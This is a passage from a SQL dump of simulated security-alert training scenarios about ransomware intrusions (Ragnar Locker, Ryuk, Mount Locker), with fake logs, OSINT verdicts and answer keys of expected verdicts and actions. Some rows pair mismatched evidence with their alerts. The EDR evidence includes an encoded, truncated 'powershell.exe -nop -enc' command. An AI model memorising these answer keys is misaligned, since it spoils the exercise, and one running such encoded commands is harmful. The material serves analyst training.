Service\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware files\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_vm.vmx\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Filename associated with 
malicious virtual machine configurations\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1584, 'Establishing Persistence via VM Configuration', 'high', 'Configuration Monitoring', 'Ragnar Locker configures the virtual machine to automatically start, ensuring the ransomware maintains a foothold in the system. This involves modifying the VM\'s startup settings to execute the ransomware upon boot.', 'Persistence', 'T1050 - New Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:37Z\",\"event_id\":\"CONFIG_CHANGE_101\",\"vm_name\":\"Compromised_VM_01\",\"user\":\"admin_user\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"config_changes\":{\"auto_start\":true,\"startup_script\":\"/usr/local/bin/ragnar_locker_startup.sh\"},\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"detected_by\":\"VM Configuration Monitor\"}', '2026-03-15 19:16:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised VM\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Ragnar Locker\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"clean\",\"details\":\"Legitimate admin user\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Ragnar Locker ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 
'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.624Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":\\\"CONFIG_CHANGE_101\\\",\\\"vm_name\\\":\\\"Compromised_VM_01\\\",\\\"user\\\":\\\"admin_user\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"config_changes\\\":{\\\"auto_start\\\":true,\\\"startup_script\\\":\\\"/usr/local/bin/ragnar_locker_startup.sh\\\"},\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"detected_by\\\":\\\"VM Configuration Monitor\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.624Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":\\\"CONFIG_CHANGE_101\\\",\\\"vm_name\\\":\\\"Compromised_VM_01\\\",\\\"user\\\":\\\"admin_user\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"config_changes\\\":{\\\"auto_start\\\":true,\\\"startup_script\\\":\\\"/usr/local/bin/ragnar_locker_startup.sh\\\"},\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"detected_by\\\":\\\"VM Configuration Monitor\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.624Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":\\\"CONFIG_CHANGE_101\\\",\\\"vm_name\\\":\\\"Compromised_VM_01\\\",\\\"user\\\":\\\"admin_user\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"config_changes\\\":{\\\"auto_start\\\":true,\\\"startup_script\\\":\\\"/usr/local/bin/ragnar_locker_startup.sh\\\"},\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"detected_by\\\":\\\"VM Configuration Monitor\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.624Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":\\\"CONFIG_CHANGE_101\\\",\\\"vm_name\\\":\\\"Compromised_VM_01\\\",\\\"user\\\":\\\"admin_user\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"config_changes\\\":{\\\"auto_start\\\":true,\\\"startup_script\\\":\\\"/usr/local/bin/ragnar_locker_startup.sh\\\"},\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"detected_by\\\":\\\"VM Configuration Monitor\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.624Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":\\\"CONFIG_CHANGE_101\\\",\\\"vm_name\\\":\\\"Compromised_VM_01\\\",\\\"user\\\":\\\"admin_user\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"config_changes\\\":{\\\"auto_start\\\":true,\\\"startup_script\\\":\\\"/usr/local/bin/ragnar_locker_startup.sh\\\"},\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"detected_by\\\":\\\"VM Configuration Monitor\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1585, 'Lateral Movement within the Gaming Network', 'high', 'Internal Network Monitoring', 'Using the virtual machine as a base, Ragnar Locker moves laterally to infect core gaming servers, threatening the entire infrastructure.', 'Lateral Movement', 'T1570', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"event_id\":\"4625\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.0.0.8\",\"username\":\"gameadmin\",\"process_name\":\"svchost.exe\",\"file_hash\":\"3c6e0b8a9c15224a8228b9a98ca1531d\",\"filename\":\"RagnarLocker.exe\",\"network_protocol\":\"SMB\",\"action\":\"Remote File Execution\"}', '2026-03-15 19:16:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local internal IP address used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical gaming server targeted for ransomware infection.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3c6e0b8a9c15224a8228b9a98ca1531d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Ragnar Locker ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"RagnarLocker.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Executable file used for ransomware deployment.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"gameadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Administrative user account used for unauthorized 
access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1586, 'Data Exfiltration through Encrypted Channels', 'high', 'Data Loss Prevention (DLP)', 'Before launching a full-scale encryption attack, Ragnar Locker exfiltrates valuable data through encrypted channels, ensuring a dual impact by transmitting confidential gaming data. This step involves the transfer of sensitive files from the internal network to an external malicious server.', 'Exfiltration', 'T1048.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_type\":\"file_transfer\",\"src_ip\":\"10.0.0.15\",\"dest_ip\":\"203.0.113.45\",\"file_name\":\"confidential_gaming_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"protocol\":\"TLS\",\"data_volume\":\"500MB\",\"action\":\"allowed\",\"signature_id\":\"DLP-EXFIL-001\",\"description\":\"Suspicious file transfer detected via encrypted channel.\"}', '2026-03-15 19:16:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with the source of the file transfer.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_network\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with Ragnar Locker APT.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_gaming_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file being exfiltrated.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known exfiltration 
activities.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_directory\",\"verdict\":\"internal\",\"details\":\"Username of the individual involved in the transfer.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.629Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"file_transfer\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"file_name\\\":\\\"confidential_gaming_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"data_volume\\\":\\\"500MB\\\",\\\"action\\\":\\\"allowed\\\",\\\"signature_id\\\":\\\"DLP-EXFIL-001\\\",\\\"description\\\":\\\"Suspicious file transfer detected via encrypted channel.\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.629Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"file_transfer\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"file_name\\\":\\\"confidential_gaming_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"data_volume\\\":\\\"500MB\\\",\\\"action\\\":\\\"allowed\\\",\\\"signature_id\\\":\\\"DLP-EXFIL-001\\\",\\\"description\\\":\\\"Suspicious file transfer 
detected via encrypted channel.\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.629Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"file_transfer\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"file_name\\\":\\\"confidential_gaming_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"data_volume\\\":\\\"500MB\\\",\\\"action\\\":\\\"allowed\\\",\\\"signature_id\\\":\\\"DLP-EXFIL-001\\\",\\\"description\\\":\\\"Suspicious file transfer detected via encrypted channel.\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.629Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"file_transfer\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"file_name\\\":\\\"confidential_gaming_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"data_volume\\\":\\\"500MB\\\",\\\"action\\\":\\\"allowed\\\",\\\"signature_id\\\":\\\"DLP-EXFIL-001\\\",\\\"description\\\":\\\"Suspicious file transfer detected via encrypted channel.\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.629Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"file_transfer\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"file_name\\\":\\\"confidential_gaming_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"data_volume\\\":\\\"500MB\\\",\\\"action\\\":\\\"allowed\\\",\\\"signature_id\\\":\\\"DLP-EXFIL-001\\\",\\\"description\\\":\\\"Suspicious file transfer detected via encrypted channel.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1587, 'Initial Access via Phishing Email', 'medium', 'Email security gateway logs', 'A phishing email purportedly from a trusted source was detected, containing a malicious attachment intended to gain initial access to the network. The email originated from an IP address associated with malicious activity and contained a known malware hash used by the Mount Locker group.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"source_email\":\"john.doe@fakesupplier.com\",\"destination_email\":\"employee@victimcompany.com\",\"subject\":\"Urgent: Invoice Attached\",\"attachment\":{\"filename\":\"invoice_october.pdf\",\"hash\":\"3b1f1c2d2b8e7abf9a3f1e2d3f1a2b3e\"},\"user\":\"employee\",\"action\":\"email_delivered\"}', '2026-03-15 19:16:21', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3b1f1c2d2b8e7abf9a3f1e2d3f1a2b3e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash linked to Mount Locker group\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"john.doe@fakesupplier.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email domain recently registered\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_october.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis Platform\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in 
phishing\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-03-15T20:58:15.635Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1588, 'Payload Execution Detected', 'high', 'Endpoint detection and response system', 'The ransomware payload has been executed on the compromised machine, encrypting files and starting the ransom demand process.', 'Malware Execution', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"EVT-20231015-0001\",\"computer_name\":\"DESKTOP-7GJ2EXQ\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.45\",\"attacker_ip\":\"203.0.113.15\",\"malware_name\":\"Ryuk\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\ryuk.exe\",\"file_hash\":\"6dcd4ce23d88e2ee9568ba546c04e2a5\",\"action\":\"Executed\",\"result\":\"File Encrypted\"}', '2026-03-15 19:16:21', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known ransomware actor IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"6dcd4ce23d88e2ee9568ba546c04e2a5\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Ransomware payload hash\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ryuk.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint_detection\",\"verdict\":\"malicious\",\"details\":\"Ransomware payload file\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1589, 'Persistence through Scheduled Task', 'medium', 'System event logs', 'The Mount Locker ransomware group has established persistence on the system by creating a scheduled task. This task is set to execute a malicious script at regular intervals, ensuring continued access and control over the compromised system.', 'Persistence Mechanism', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 1, 'new', NULL, '{\"event_id\":4698,\"timestamp\":\"2023-10-03T11:45:32Z\",\"task_name\":\"Windows_Update_12\",\"task_path\":\"\\\\Microsoft\\\\Windows\\\\\",\"user\":\"SYSTEM\",\"action\":\"Create\",\"description\":\"A scheduled task was created\",\"task_to_run\":\"C:\\\\Windows\\\\System32\\\\tasks\\\\malicious_script.bat\",\"author\":\"SYSTEM\",\"trigger\":\"Daily\",\"enabled\":\"true\",\"ip_address\":\"192.168.1.102\",\"external_ip\":\"203.0.113.45\",\"malware_hash\":\"a9f5d9e7f6c3b2a1d4e8c9b1f2a6e5c4\",\"username\":\"administrator\"}', '2026-03-15 19:16:21', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used by Mount Locker group\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a9f5d9e7f6c3b2a1d4e8c9b1f2a6e5c4\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mount Locker ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.bat\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to maintain 
persistence\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_activity\",\"verdict\":\"clean\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.640Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"timestamp\\\":\\\"2023-10-03T11:45:32Z\\\",\\\"task_name\\\":\\\"Windows_Update_12\\\",\\\"task_path\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Create\\\",\\\"description\\\":\\\"A scheduled task was created\\\",\\\"task_to_run\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tasks\\\\\\\\malicious_script.bat\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"enabled\\\":\\\"true\\\",\\\"ip_address\\\":\\\"192.168.1.102\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"a9f5d9e7f6c3b2a1d4e8c9b1f2a6e5c4\\\",\\\"username\\\":\\\"administrator\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.640Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"timestamp\\\":\\\"2023-10-03T11:45:32Z\\\",\\\"task_name\\\":\\\"Windows_Update_12\\\",\\\"task_path\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Create\\\",\\\"description\\\":\\\"A scheduled task was 
created\\\",\\\"task_to_run\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tasks\\\\\\\\malicious_script.bat\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"enabled\\\":\\\"true\\\",\\\"ip_address\\\":\\\"192.168.1.102\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"a9f5d9e7f6c3b2a1d4e8c9b1f2a6e5c4\\\",\\\"username\\\":\\\"administrator\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.640Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"timestamp\\\":\\\"2023-10-03T11:45:32Z\\\",\\\"task_name\\\":\\\"Windows_Update_12\\\",\\\"task_path\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Create\\\",\\\"description\\\":\\\"A scheduled task was 